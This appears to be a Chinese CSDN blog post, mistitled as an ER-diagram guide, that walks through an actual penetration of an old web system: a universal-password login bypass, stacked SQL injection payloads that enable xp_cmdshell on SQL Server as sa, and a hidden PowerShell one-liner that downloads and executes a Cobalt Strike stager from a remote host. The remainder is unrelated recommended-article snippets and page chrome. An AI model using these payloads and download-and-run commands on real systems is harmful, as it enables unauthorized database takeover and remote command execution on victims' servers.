sqlserver生成er图_sqlserver注入到cs上线

最新推荐文章于 2024-03-26 12:54:49 发布
最新推荐文章于 2024-03-26 12:54:49 发布
阅读量1.5k 收藏 1
点赞数
文章标签: sqlserver生成er图
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42396285/article/details/113320336
版权
随手记录一下项目挖洞的情况,因为是私密项目,脱敏之后,权当是公众号水文章了,也是顺带记录一下自己挖洞的历程,希望一天比一天进步,发过的文章就是最好的见证成长的记录。 狗头在上 , 打码为敬

719cda9b2b5257cab972f881d490279c.png

一看这个界面 , 就知道是老系统 , 肯定存在很多问题 , 随手一试 , 发现万能密码直接登录成功

f6b7b3d3e8d7c06e69a06f9f14e22659.png

其他端口测试发现数据库为sqlserver , 且是sa用户 尝试 开启xp扩展

d2eecc76085511fb3fb64a2b2334c799.png

Poc:uname=admin';EXEC master..sp_configure 'SHOW advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'SHOW advanced options',0; RECONFIGURE WITH OVERRIDE---- &upwd=123123&EngState=1&ident=
发现成功 , 准备 上线cs服务器

08c7b9bf2858bfae327687b11e8c26fa.png

Poc:uname=admin';DECLARE @er VARCHAR(8000);SET @er=(需要hex编码一下);EXEC master..xp_cmdshell @er-- &upwd=123123&EngState=1&ident=

此处不知道哪里有问题,网上在线的编码一直有问题,推荐使用小葵编码工具

ec1c73ad129010d3b91a5ec2731227c4.png

此处就是我们需要的值 上线成功

177a5042120805cf2e9706f6e1141969.png

执行命令成功

0185e633ed8225eff90f10b34b2d1e4a.png

记录一下cs的操作步骤 1. 设置监听 61b5b002da7abda77803393dfb5e4b8c.png 2. 一顿设置监听的方式还有内容 7f0c7315b888d13cf5b25b70762da44a.png 3. 看图 0f5e7f8b7c1f0e0d1be1dc39305bedad.png 0d9008f01960415357e4cae87f106cfa.png 4. 生成命令结果 
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.10:2112/a'))"
这里用的是powershell上线 , 因为是Windows的 5. 静待上线
阿尔乐夫号炮手
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
毕业论文jsp2006(CS)个人名片通讯录sqlserver.doc
08-21
包括摘要,背景意义,论文结构安排,开发技术介绍,需求分析,可行性分析,功能分析,业务流程分析,数据库设计,er图,数据字典,数据流图,详细设计,系统截图,测试,总结,致谢,参考文献。
毕业论文jsp930(CS)汽车维修管理系统sqlserver.doc
08-18
包括摘要,背景意义,论文结构安排,开发技术介绍,需求分析,可行性分析,功能分析,业务流程分析,数据库设计,er图,数据字典,数据流图,详细设计,系统截图,测试,总结,致谢,参考文献。
数据库SQL语句生成ER图、AI画图、ER图实体快速生成
最新发布
u013244640的博客
03-26 2864
以往的ER图画图软件(比如Visio、drawio、EA、Rose、StartUML等)都需要我们花费一些时间去画图,也不算很方便,如果你想省时省力,请看这里-数据库SQL语句生成ER图、AI画图、ER图实体快速生成
毕业论文jsp510(CS)课题库设计(sqlserver).doc
08-17
包括摘要,背景意义,论文结构安排,开发技术介绍,需求分析,可行性分析,功能分析,业务流程分析,数据库设计,er图,数据字典,数据流图,详细设计,系统截图,测试,总结,致谢,参考文献。
Myeclipse生成ER图
05-07
用myeclipse生成ER图,比较简单
数据库在线自生成ER图
热门推荐
qq_1440950222的博客
07-22 3万+
本网站可快速生成数据表ER图,不需要手动绘制
SQLServer_ER关系模型图
binnnnnnn_的博客
03-27 3327
某医院病房计算机管理中心 科室:科名、科地址、科电话、医生姓名 病房:病房号、床位号、所属科室名 医生:姓名、职称、所属科室名、年龄、工作证号 病人 病历号、姓名、性别、诊断、主臂医生、病房号 一个科室有多个病房、多个医生; 一个病房只能属于一个科室; 一个医生只属于一个科室,但可负责多个病人的诊治; 一个病人的主管医生只有一个。 完成如下设计: 1、设计该计算机管理系统的E-R图。 2、将该E-R图转换为关系模式结构。 3、指出转换结果申每个关系模式的主键和外键。 1、设计该计算机管理系统的E.
SQL SERVER导出模型图
orangewyy的博客
05-17 1万+
软件环境:sql server 和Power Designer 第一步,导出数据库脚本 右键点击你要导出的数据库,选择 任务->生成脚本 一直点击下一步(中间要选中你要导出的表),最后要设置输出选项,我们要进行ER图导出,需要用到sql文件,所以我们选择第一个 第二步:打开Power designer 首先新建一个物理模型,打开之后,点击File->Reverse En...
一个在线ER模型设计工具:支持数据库设计、生成、反向工程、优化和文档生成等操作
weixin_41007536的博客
01-18 1万+
Freedgo ER 可以帮助开发人员更好地完成ER模型设计,支持许多数据库平台,可以生成数据库脚本和数据库,支持反向工程和数据库优化。总之,ER模型设计是数据库建模的重要工具,可以帮助开发人员更好地理解数据库结构,确定数据库的概念模型,并进行数据库设计、生成、反向工程、优化和文档生成等操作。需要注意的是, ER 模型设计并不是数据库设计的终点,而是一个起点。此外, ER 模型是一个静态的模型,并不能完全反映出实际系统的动态性,所以在实际应用中,需要结合其他模型如状态模型,事务模型等来进行数据库设计。
SSMS中ER图创建教程(SQL)
若如初见
06-04 9070
1.打开SSMS,连接SQL Server: 2.选择要创建ER的数据库,选择 数据关系图,鼠标右键点击选择新建数据库关系图: 3.选择要在ER图中包含的表格,按“ctrl”或“shift”按钮并选择表格来选择多个表格; 4.点击添加,这样就建好啦! 5.如果需要更具体ER图比如下图,可能需要用别的工具哦。 ...
毕业论文jsp944(CS)图书馆管理系统sqlserver+mysql.doc
08-18
包括摘要,背景意义,论文结构安排,开发技术介绍,需求分析,可行性分析,功能分析,业务流程分析,数据库设计,er图,数据字典,数据流图,详细设计,系统截图,测试,总结,致谢,参考文献。
毕业论文asp.net93(CS)酒店管理系统(sqlserver).doc
08-23
包括摘要,背景意义,论文结构安排,开发技术介绍,需求分析,可行性分析,功能分析,业务流程分析,数据库设计,er图,数据字典,数据流图,详细设计,系统截图,测试,总结,致谢,参考文献。
powerDesigner反向生成数据库ER图心得
yeah_nn的博客
08-31 1117
踩了很多坑,今天的总结一下。 1.先选择配置数据源 2.这步,DBMS选择对应的数据库,这里博主用的是ORACLE数据库,然后点击确定 3.选择Using a datasource,如果之前没有设置,点击鼠标位置进入设置 4.选择Data source下面的Connection profile,在点击Configure,进行新增 5.点击新增 6.根据内容进行填写: Connection profile name:输入数据库连接文件名,它会自动加上后缀名.dc...
SQL Server高级查询之数据库设计(E-R模型图)
qq_45308912的博客
09-01 1408
1.E-R模型(entity relationship) 以下就是一个简单的E-R模型图
PowerDesigner导入SQL脚本生成带中文注释(comment)的ER图并保存为图片格式(含通用可执行vb脚本文件)
蓝多多的小仓库
12-18 7146
先多选一列code(用于改为注释),步骤:Tools------>Display Preferences------>table------>Advances------>columns------>select------>勾选code------>OK------>确定。到此,我们可以看到刚刚选择好的需要导入的 SQL 脚本文件列表,如果还需要选择,可重复步骤4;Tools------>Display Preferences------>table,这里你需要显示什么就勾选即可。
ER图实例解析
ssl vpn ------adito (ssl explorer) (openvpn als)&&网络安全
01-30 1362
实体关系图也是设计数据库的关键问题,同时开发工程师也需要理解系统设计人员发布的ER图。是开发不可避免并经常用到的问题。所以加以论述。而本章使用的Microsoft SQL Server2000。由于其简单易用,是学习的好工具,所以采用。采用ERwin也是由于许多的开发商使用和简单易用的特性的原因,另外用得好的是PowerDesigner由于稍显复杂,故未采用。  实体关系图(ER图)   在下
一款在线ER模型生成的工具: MySQL逆向工程,ER模型生成,通过DDL语句生成ER模型...
06-12 2654
我是如何生成ER模型图,无脑加小白生成ER模型,还用画ER模型图吗,直接导入,数据库视图直接导入查看。 Freedgo(自由行走) Design 一款在线ER模型生成的工具,可以针对MySQL的DDL文件在线生成ER模型图表。 支持导入SQL文件创建ER模型, 支持create table,a...
开源的ER图创建工具
C_C_L的专栏
11-27 1485
请注意,这些工具可能在功能和界面设计上有所不同。在选择工具时,你可能需要考虑数据库系统的兼容性、用户友好性、导出选项以及是否满足你的具体需求。在开源领域,也有一些工具可供创建实体关系图(ER图)。
sql server生成er图
05-12
SQL Server 是一种关系型数据库管理系统,它可以通过 SQL Server Management Studio (SSMS) 工具生成 ER 图。 下面是生成 ER 图的步骤: 1. 打开 SQL Server Management Studio 工具。 2. 在 Object Explorer 中,选择你要生成 ER 图的数据库。 3. 右键单击该数据库,选择 Tasks -> Generate Scripts。 4. 在 Generate Scripts 向导中,选择要生成 ER 图的数据库对象。例如,你可以选择所有数据库对象或只选择某些表。 5. 在 Set Scripting Options 页面中,选择输出选项。你可以选择将输出脚本保存到文件或将其复制到剪贴板。 6. 点击下一步,然后在 Summary 页面中查看你的选择。 7. 点击下一步,然后等待脚本生成完成。 8. 打开生成的脚本文件,将其复制到 SQL Server 数据库图形化建模工具中,如 Visio 或 PowerDesigner。 9. 在建模工具中,选择 ER 图模板,然后将脚本粘贴到文本框中。 10. 点击生成按钮,即可生成 ER 图。 注意:生成 ER 图需要使用第三方建模工具。SQL Server Management Studio 本身不提供 ER 图生成功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值